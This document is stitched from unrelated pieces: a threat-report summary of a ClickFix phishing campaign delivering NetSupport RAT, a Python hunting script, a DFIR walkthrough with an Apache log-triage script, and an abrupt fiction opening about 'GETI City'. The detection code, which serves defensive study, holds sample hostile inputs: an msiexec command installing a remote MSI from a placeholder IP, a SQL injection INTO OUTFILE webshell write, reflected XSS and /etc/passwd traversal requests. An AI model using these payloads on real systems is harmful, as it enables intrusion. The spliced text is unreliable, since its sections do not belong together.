ClickFix Phishing Campaign Delivering NetSupport RAT
A multi-stage attack chain leveraging fake property review portals, ClickFix social engineering, and a custom MSI dropper to establish persistent remote access via NetSupport Manager.
Executive Summary
A threat actor is running a phishing campaign that impersonates Booking.com and directs victims to fraudulent property review portals. A ClickFix lure tricks the user into running a malicious msiexec command that downloads and installs a custom MSI dropper from attacker-controlled IP addresses. The dropper deploys a VBScript installer that extracts password-protected archives, establishes persistence through the Windows Startup folder, and launches a NetSupport Manager client configured to run silently, giving the attacker full remote access to the compromised machine. All staging files are deleted on completion to impede forensic investigation. Two C2 domains masquerade as CDN infrastructure to blend into normal network traffic.
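The chain above leaves a recognisable shape in process telemetry: msiexec pulling an installer straight from an http(s) source, a script host spawned beneath it running a .vbs from a user-writable path, and a write into the Startup folder by that same lineage. The script below is an added hunting example, not code from the report; the events it scans are constructed Sysmon-style records, and the URL, PIDs, file names and the 203.0.113.x address are placeholders rather than indicators from the campaign.

```python
"""Hunt for the ClickFix -> msiexec -> VBScript -> Startup-folder chain in
process telemetry. Added example: the events below are constructed
(Sysmon EID 1 / EID 11-style fields); URL, paths and PIDs are placeholders,
not indicators from the campaign."""
import re

# msiexec installing directly from an http(s) source, as a pasted ClickFix command would.
MSIEXEC_REMOTE = re.compile(
    r"msiexec(?:\.exe)?\b.*?/(?:i|package)\s+[\"']?(https?://[^\s\"']+)", re.IGNORECASE)
QUIET_FLAG = re.compile(r"\s/(?:q[nb]?|quiet)\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(?:Temp|AppData|Users\\[^\\]+\\Downloads)\\", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)

# Constructed process-creation events (not real telemetry). pid 6000 is a benign local install.
SAMPLE_PROC_EVENTS = [
    {"pid": 4412, "ppid": 3980, "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 5120, "ppid": 4412, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i http://203.0.113.10/review.msi /qn"},
    {"pid": 5204, "ppid": 5120, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\victim\AppData\Local\Temp\install.vbs"'},
    {"pid": 5300, "ppid": 5204, "image": r"C:\Users\victim\AppData\Roaming\client\client.exe",
     "cmdline": r"C:\Users\victim\AppData\Roaming\client\client.exe"},
    {"pid": 6000, "ppid": 4412, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\victim\Downloads\7zip.msi /qn"},
]
# Constructed file-creation events; the .lnk name is a placeholder for whatever the
# installer drops into the Startup folder.
SAMPLE_FILE_EVENTS = [
    {"pid": 5204, "target": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
                            r"\Start Menu\Programs\Startup\client.lnk"},
    {"pid": 5204, "target": r"C:\Users\victim\AppData\Local\Temp\archive.zip"},
]


def remote_msi_source(cmdline):
    """Return the remote URL msiexec was told to install from, or None for local sources."""
    m = MSIEXEC_REMOTE.search(cmdline)
    return m.group(1) if m else None


def is_quiet(cmdline):
    return bool(QUIET_FLAG.search(cmdline))


def descendants(events, root_pid):
    """All processes below root_pid in the parent/child tree (PID reuse is ignored here)."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e["ppid"], []).append(e)
    out, stack = [], [root_pid]
    while stack:
        for child in by_parent.get(stack.pop(), []):
            out.append(child)
            stack.append(child["pid"])
    return out


def find_clickfix_chains(proc_events, file_events):
    """Anchor on remote msiexec installs and score each by the later stages found beneath it."""
    findings = []
    for e in proc_events:
        url = remote_msi_source(e["cmdline"])
        if not url:
            continue
        kids = descendants(proc_events, e["pid"])
        lineage = {k["pid"] for k in kids} | {e["pid"]}
        script_stage = [k for k in kids
                        if k["image"].rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS
                        and USER_WRITABLE.search(k["cmdline"])]
        persistence = [f for f in file_events
                       if f["pid"] in lineage and STARTUP_DIR.search(f["target"])]
        # Remote MSI alone is suspicious; quiet flag, script stage and Startup write each add weight.
        score = 1 + (1 if is_quiet(e["cmdline"]) else 0) \
                  + (2 if script_stage else 0) + (2 if persistence else 0)
        findings.append({"pid": e["pid"], "url": url, "quiet": is_quiet(e["cmdline"]),
                         "script_stage": [k["pid"] for k in script_stage],
                         "startup_files": [f["target"] for f in persistence],
                         "score": score})
    return findings


if __name__ == "__main__":
    for f in find_clickfix_chains(SAMPLE_PROC_EVENTS, SAMPLE_FILE_EVENTS):
        print(f"pid {f['pid']} score {f['score']}: msiexec from {f['url']}, "
              f"script stage {f['script_stage']}, startup writes {f['startup_files']}")
```

The local 7zip install is deliberately left unflagged: msiexec with a quiet flag is routine, and it is the remote source plus the script host and Startup write beneath it that make the chain worth an analyst's time. In a real estate the file events would come from Sysmon EID 11 or an EDR file-write feed, and the score threshold would be tuned against baseline msiexec activity.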
Scope. A company web server was compromised through the site it hosted. The team captured a forensic disk image and a live memory dump for offline analysis. Artifacts for this walkthrough: archive.org: dfir-case1.
Web layer. Apache access and error logs show repeated OWASP-style abuse: SQL injection (including attempted INTO OUTFILE / upload-style payloads), reflected XSS, local file inclusion / path traversal, and a request to clear the application's IDS log, consistent with an attempt to cover tracks.
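A first pass over an access log of this kind is mechanical enough to script: parse the combined format, URL-decode the request target (twice, to catch double encoding), and tag each request against a small set of patterns for the abuse classes listed above. The triage script below is an added example and not part of the walkthrough; its log lines are constructed stand-ins for the case's access.log, the IPs are documentation addresses, and the paths, including the assumed `ids.php?action=clear_log` request, are placeholders rather than the real artefacts.

```python
"""Triage Apache combined-format access logs for the abuse classes seen in the case:
SQLi (with INTO OUTFILE), reflected XSS, LFI / traversal and IDS log clearing.
Added example; SAMPLE_LOG is constructed, not the case's real access.log."""
import re
from collections import Counter
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Each rule is applied to the fully decoded request target; a line may carry several tags.
RULES = [
    ("sqli_outfile", re.compile(r"into\s+(?:out|dump)file", re.I)),
    ("sqli", re.compile(r"union(?:\s+all)?\s+select|'\s*(?:or|and)\s+[\w'\"]+\s*=|"
                        r"sleep\(\s*\d+\s*\)|;\s*drop\s+table", re.I)),
    ("xss", re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.I)),
    ("lfi_traversal", re.compile(r"(?:\.\./|\.\.\\){2,}|/etc/passwd|/proc/self/environ|php://", re.I)),
    # Assumed shape of a log-clearing request; adjust to the application's real endpoint.
    ("log_tampering", re.compile(r"(?:clear|purge|truncate|delete)[_-]?(?:ids[_-]?)?logs?|"
                                 r"logs?[_-]?clear", re.I)),
]

# Constructed sample lines (documentation IPs, placeholder paths), not the case artefacts.
SAMPLE_LOG = """
203.0.113.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2024:10:01:09 +0000] "GET /products.php?id=1%27%20UNION%20SELECT%201,2,3%20INTO%20OUTFILE%20%27/var/www/html/sh.php%27--%20- HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2024:10:01:15 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2024:10:01:21 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2024:10:02:40 +0000] "GET /admin/ids.php?action=clear_log HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:03:00 +0000] "GET /products.php?id=42 HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify(target):
    """Decode the request target twice and return the list of matching rule names."""
    decoded = unquote_plus(unquote_plus(target))
    return [name for name, rx in RULES if rx.search(decoded)]


def triage(log_text):
    """Return only the flagged requests, each with its tags, in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["target"])
        if tags:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                             "target": rec["target"], "tags": tags})
    return findings


def summarize(findings):
    """Count flagged requests per source IP, to surface the attacker's address quickly."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} {h['status']} {','.join(h['tags'])} {h['target']}")
    print("per-IP:", dict(summarize(hits)))
```

The status codes matter as much as the tags: a 200 on the INTO OUTFILE request says the query ran, and whether the target path it named now exists on the disk image is the next thing to check. Patterns like these are a triage aid, not a verdict; anything tagged still needs the request read in full alongside the error log.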
In the heart of Golang Country stands GETI City - a metropolis where technology and ambition touch the sky…
Scene 1: The City
The winter wind howls through GETI City’s glass-and-steel canyons, carrying whispers of digital secrets between towering skyscrapers. Neon signs pierce the darkness, their glow reflecting off the frost-covered windows of Brukley Company’s cybersecurity headquarters.